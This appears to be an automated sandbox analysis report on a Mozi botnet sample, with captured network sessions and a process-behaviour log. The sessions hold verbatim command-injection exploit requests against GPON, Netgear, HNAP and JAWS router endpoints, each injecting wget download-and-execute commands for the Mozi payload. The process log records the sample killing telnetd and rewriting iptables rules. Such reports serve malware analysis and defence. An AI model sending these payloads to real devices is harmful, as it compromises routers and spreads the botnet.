                                                                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                                                                  Feb 6, 2021 11:38:49.967998028 CET | 1151 | OUT | POST /GponForm/diag_Form?images/ HTTP/1.1
                                                                                                                  Host: 127.0.0.1:80
                                                                                                                  Connection: keep-alive
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Accept: */*
                                                                                                                  User-Agent: Hello, World
                                                                                                                  Content-Length: 118
                                                                                                                  Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
Feb 6, 2021 11:38:50.163552046 CET | 1151 | IN | HTTP/1.1 200 OK
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Encoding: gzip
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Server: Microsoft-IIS/7.5
                                                                                                                  X-Powered-By: ASP.NET
                                                                                                                  Date: Sat, 06 Feb 2021 10:39:02 GMT
                                                                                                                  Content-Length: 205
Feb 6, 2021 11:38:50.163602114 CET | 1152 | IN | HTTP/1.1 400 Bad Request
                                                                                                                  Content-Type: text/html; charset=us-ascii
                                                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                                                  Date: Sat, 06 Feb 2021 10:39:02 GMT
                                                                                                                  Connection: close
                                                                                                                  Content-Length: 326
                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request - Invalid Verb</h2><hr><p>HTTP Error 400. The request verb is invalid.</p></BODY></HTML>


Session ID | Source IP | Source Port | Destination IP | Destination Port
27 | 192.168.2.20 | 53268 | 104.103.19.232 | 80
Timestamp | kBytes transferred | Direction | Data
Feb 6, 2021 11:39:00.933777094 CET | 1200 | OUT | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Feb 6, 2021 11:39:01.090933084 CET | 1201 | IN | HTTP/1.0 400 Bad Request
                                                                                                                  Server: AkamaiGHost
                                                                                                                  Mime-Version: 1.0
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 208
                                                                                                                  Expires: Sat, 06 Feb 2021 10:39:01 GMT
                                                                                                                  Date: Sat, 06 Feb 2021 10:39:01 GMT
                                                                                                                  Connection: close
                                                                                                                  Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;50a43617&#46;1612607941&#46;a7840bb</BODY></HTML>


Session ID | Source IP | Source Port | Destination IP | Destination Port
28 | 192.168.2.20 | 45072 | 77.238.74.163 | 80
Timestamp | kBytes transferred | Direction | Data
Feb 6, 2021 11:39:10.830598116 CET | 2065 | OUT | POST /GponForm/diag_Form?images/ HTTP/1.1
                                                                                                                  Host: 127.0.0.1:80
                                                                                                                  Connection: keep-alive
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Accept: */*
                                                                                                                  User-Agent: Hello, World
                                                                                                                  Content-Length: 118
                                                                                                                  Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
Feb 6, 2021 11:39:10.906177998 CET | 2066 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                  Server: nginx/1.16.1
                                                                                                                  Date: Sat, 06 Feb 2021 10:39:10 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 157
                                                                                                                  Connection: close
                                                                                                                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.16.1</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
29 | 192.168.2.20 | 37542 | 176.119.128.106 | 80
Timestamp | kBytes transferred | Direction | Data
Feb 6, 2021 11:39:10.923391104 CET | 2066 | OUT | POST /GponForm/diag_Form?images/ HTTP/1.1
                                                                                                                  Host: 127.0.0.1:80
                                                                                                                  Connection: keep-alive
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Accept: */*
                                                                                                                  User-Agent: Hello, World
                                                                                                                  Content-Length: 118
                                                                                                                  Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
Feb 6, 2021 11:39:11.084525108 CET | 2067 | IN | HTTP/1.1 302 Found
                                                                                                                  Date: Sat, 06 Feb 2021 10:39:10 GMT
                                                                                                                  Server: Apache/2.2.15 (CentOS)
                                                                                                                  X-Powered-By: PHP/5.3.3
                                                                                                                  location: http://shareyourcharities.com/red.php/diag_Form
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port
3 | 192.168.2.20 | 35088 | 23.254.64.88 | 80
Timestamp | kBytes transferred | Direction | Data
Feb 6, 2021 11:35:58.898740053 CET | 319 | OUT | POST /HNAP1/ HTTP/1.0
                                                                                                                  Host: 23.254.64.88:80
                                                                                                                  Content-Type: text/xml; charset="utf-8"
                                                                                                                  SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                                                                                                                  Content-Length: 640
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Feb 6, 2021 11:35:59.032236099 CET | 320 | IN | HTTP/1.1 500 Internal Server Error
                                                                                                                  Server: Tengine/2.0.0
                                                                                                                  Date: Sat, 06 Feb 2021 10:35:58 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 677
                                                                                                                  Connection: close
                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body bgcolor="white"><h1>500 Internal Server Error</h1><p>The server encountered an internal error or misconfiguration and was unable to complete your request. Sorry for the inconvenience.<br/>Please report this message and include the following information to us.<br/>Thank you very much!</p><table><tr><td>URL:</td><td>http://23.254.64.88/HNAP1/</td></tr><tr><td>Server:</td><td>sm001.prox.microleaves.com</td></tr><tr><td>Date:</td><td>2021/02/06 05:35:58</td></tr></table><hr/>Powered by Tengine/2.0.0</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
4 | 192.168.2.20 | 46030 | 203.46.145.77 | 80
Timestamp | kBytes transferred | Direction | Data
Feb 6, 2021 11:36:20.104547977 CET | 419 | OUT | POST /GponForm/diag_Form?images/ HTTP/1.1
                                                                                                                  Host: 127.0.0.1:80
                                                                                                                  Connection: keep-alive
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Accept: */*
                                                                                                                  User-Agent: Hello, World
                                                                                                                  Content-Length: 118
                                                                                                                  Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
Feb 6, 2021 11:36:20.451877117 CET | 419 | IN | HTTP/1.1 404 Not Found
                                                                                                                  Content-Type: text/html; charset=us-ascii
                                                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                                                  Date: Sat, 06 Feb 2021 10:36:20 GMT
                                                                                                                  Connection: close
                                                                                                                  Content-Length: 315
                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


Session ID | Source IP | Source Port | Destination IP | Destination Port
5 | 192.168.2.20 | 49398 | 23.217.12.208 | 80
Timestamp | kBytes transferred | Direction | Data
Feb 6, 2021 11:36:26.938760042 CET | 452 | OUT | GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                                                                                                                  User-Agent: Hello, world
                                                                                                                  Host: 23.217.12.208:80
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                                                                  Connection: keep-alive
Feb 6, 2021 11:36:27.137348890 CET | 452 | IN | HTTP/1.0 400 Bad Request
                                                                                                                  Server: AkamaiGHost
                                                                                                                  Mime-Version: 1.0
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 207
                                                                                                                  Expires: Sat, 06 Feb 2021 10:36:27 GMT
                                                                                                                  Date: Sat, 06 Feb 2021 10:36:27 GMT
                                                                                                                  Connection: close
                                                                                                                  Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;fd8d217&#46;1612607787&#46;35904d6</BODY></HTML>


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  6 | 192.168.2.20 | 51358 | 172.67.201.119 | 80
                                                                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                                                                  Feb 6, 2021 11:36:29.769190073 CET | 471 | OUT | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                                                                                                                  Feb 6, 2021 11:36:29.815510035 CET | 472 | IN | HTTP/1.1 400 Bad Request
                                                                                                                  Date: Sat, 06 Feb 2021 10:36:29 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 155
                                                                                                                  Connection: close
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 61d43afe49454c79-AMS
                                                                                                                  Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  7 | 192.168.2.20 | 32828 | 47.246.22.230 | 80
                                                                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                                                                  Feb 6, 2021 11:36:33.860372066 CET | 485 | OUT | GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                                                                                                                  User-Agent: Hello, world
                                                                                                                  Host: 47.246.22.230:80
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                                                                  Connection: keep-alive
                                                                                                                  Feb 6, 2021 11:36:33.991323948 CET | 486 | IN | HTTP/1.1 403 Forbidden
                                                                                                                  Server: Tengine
                                                                                                                  Date: Sat, 06 Feb 2021 10:36:33 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 254
                                                                                                                  Connection: keep-alive
                                                                                                                  Via: cache4.us13[,0]
                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body bgcolor="white"><h1>403 Forbidden</h1><p>You don't have permission to access the URL on this server.<hr/>Powered by Tengine</body></html>


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  8 | 192.168.2.20 | 60698 | 159.140.205.214 | 80
                                                                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                                                                  Feb 6, 2021 11:36:33.911283970 CET | 486 | OUT | GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                                                                                                                  User-Agent: Hello, world
                                                                                                                  Host: 159.140.205.214:80
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                                                                  Connection: keep-alive


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  9 | 192.168.2.20 | 60198 | 24.239.192.38 | 80
                                                                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                                                                  Feb 6, 2021 11:36:47.936842918 CET | 552 | OUT | GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                                                                                                                  User-Agent: Hello, world
                                                                                                                  Host: 24.239.192.38:80
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                                                                  Connection: keep-alive
                                                                                                                  Feb 6, 2021 11:36:48.084233999 CET | 555 | IN | HTTP/1.0 404 Not Found
                                                                                                                  Server: SonicWALL
                                                                                                                  Expires: -1
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Content-type: text/html;charset=UTF-8
                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><head><title>File not found!</title><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; }span.url { text-decoration: underline; }p {margin-left: 3em;}span.server {font-size: smaller;}/*...*/--></style></head><body><h1>File not found!</h1><p>The requested URL <span class="url">&#x2F;shell?cd &#x2F;tmp;rm -rf *;wget http:&#x2F;&#x2F;192.168.1.1:8088&#x2F;Mozi.a;chmod 777 Mozi.a;&#x2F;tmp&#x2F;Mozi.a jaws</span> was not found on this server.</p><p>If you entered the URL manually please check your spelling and try again.</p><h2>Error 404</h2><p><span class="server">SonicWall Server</span></p></body></html>


                                                                                                                  System Behavior

                                                                                                                  General

                                                                                                                  Start time:11:35:11
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:/usr/bin/qemu-arm /tmp/mozi.a.zip
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:11
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:11
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:11
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:11
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:/bin/sh -c "killall -9 telnetd utelnetd scfgmgr"
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:11
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:n/a
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:11
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/usr/bin/killall
                                                                                                                  Arguments:killall -9 telnetd utelnetd scfgmgr
                                                                                                                  File size:23736 bytes
                                                                                                                  MD5 hash:df59c8b62bfcf5b3bd7feaaa2295a9f7

                                                                                                                  General

                                                                                                                  Start time:11:35:11
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:11
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:11
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:26
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:26
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:/bin/sh -c "iptables -I INPUT -p tcp --destination-port 60120 -j ACCEPT"
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:26
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:n/a
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:26
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/sbin/iptables
                                                                                                                  Arguments:iptables -I INPUT -p tcp --destination-port 60120 -j ACCEPT
                                                                                                                  File size:13 bytes
                                                                                                                  MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                  General

                                                                                                                  Start time:11:35:26
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/sbin/iptables
                                                                                                                  Arguments:n/a
                                                                                                                  File size:13 bytes
                                                                                                                  MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                  General

                                                                                                                  Start time:11:35:26
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/sbin/modprobe
                                                                                                                  Arguments:/sbin/modprobe ip_tables
                                                                                                                  File size:9 bytes
                                                                                                                  MD5 hash:3d0e6fb594a9ad9c854ace3e507f86c5

                                                                                                                  General

                                                                                                                  Start time:11:35:26
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:26
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 60120 -j ACCEPT"
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:26
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:n/a
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:26
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/sbin/iptables
                                                                                                                  Arguments:iptables -I OUTPUT -p tcp --source-port 60120 -j ACCEPT
                                                                                                                  File size:13 bytes
                                                                                                                  MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                  General

                                                                                                                  Start time:11:35:26
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:26
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:/bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 60120 -j ACCEPT"
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:26
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:n/a
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:26
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/sbin/iptables
                                                                                                                  Arguments:iptables -I PREROUTING -t nat -p tcp --destination-port 60120 -j ACCEPT
                                                                                                                  File size:13 bytes
                                                                                                                  MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                  General

                                                                                                                  Start time:11:35:26
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:26
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:/bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 60120 -j ACCEPT"
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:26
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:n/a
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:26
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/sbin/iptables
                                                                                                                  Arguments:iptables -I POSTROUTING -t nat -p tcp --source-port 60120 -j ACCEPT
                                                                                                                  File size:13 bytes
                                                                                                                  MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                  General

                                                                                                                  Start time:11:35:26
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:26
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:/bin/sh -c "iptables -I INPUT -p tcp --dport 60120 -j ACCEPT"
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:26
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:n/a
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:26
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/sbin/iptables
                                                                                                                  Arguments:iptables -I INPUT -p tcp --dport 60120 -j ACCEPT
                                                                                                                  File size:13 bytes
                                                                                                                  MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                  General

                                                                                                                  Start time:11:35:26
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:26
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --sport 60120 -j ACCEPT"
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:26
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:n/a
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:26
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/sbin/iptables
                                                                                                                  Arguments:iptables -I OUTPUT -p tcp --sport 60120 -j ACCEPT
                                                                                                                  File size:13 bytes
                                                                                                                  MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                  General

                                                                                                                  Start time:11:35:26
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:26
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:/bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 60120 -j ACCEPT"
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:26
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:n/a
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:26
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/sbin/iptables
                                                                                                                  Arguments:iptables -I PREROUTING -t nat -p tcp --dport 60120 -j ACCEPT
                                                                                                                  File size:13 bytes
                                                                                                                  MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                  General

                                                                                                                  Start time:11:35:26
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:26
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:/bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 60120 -j ACCEPT"
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:26
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:n/a
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:26
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/sbin/iptables
                                                                                                                  Arguments:iptables -I POSTROUTING -t nat -p tcp --sport 60120 -j ACCEPT
                                                                                                                  File size:13 bytes
                                                                                                                  MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                  General

                                                                                                                  Start time:11:35:16
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:21
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:26
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:31
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:/bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP"
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

